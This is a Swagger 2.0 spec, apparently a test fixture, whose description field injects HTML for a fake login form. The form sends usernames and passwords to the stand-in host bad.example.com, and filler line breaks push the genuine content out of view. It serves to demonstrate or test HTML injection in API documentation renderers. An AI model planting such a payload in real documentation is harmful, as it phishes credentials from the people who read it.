swagger: '2.0'
info:
  version: 1.0.0
  title: Not Real Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Demonstration of fake login page</h1>
    </div>
    <div class="form-container">
        <form action="https://bad.example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>
<br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
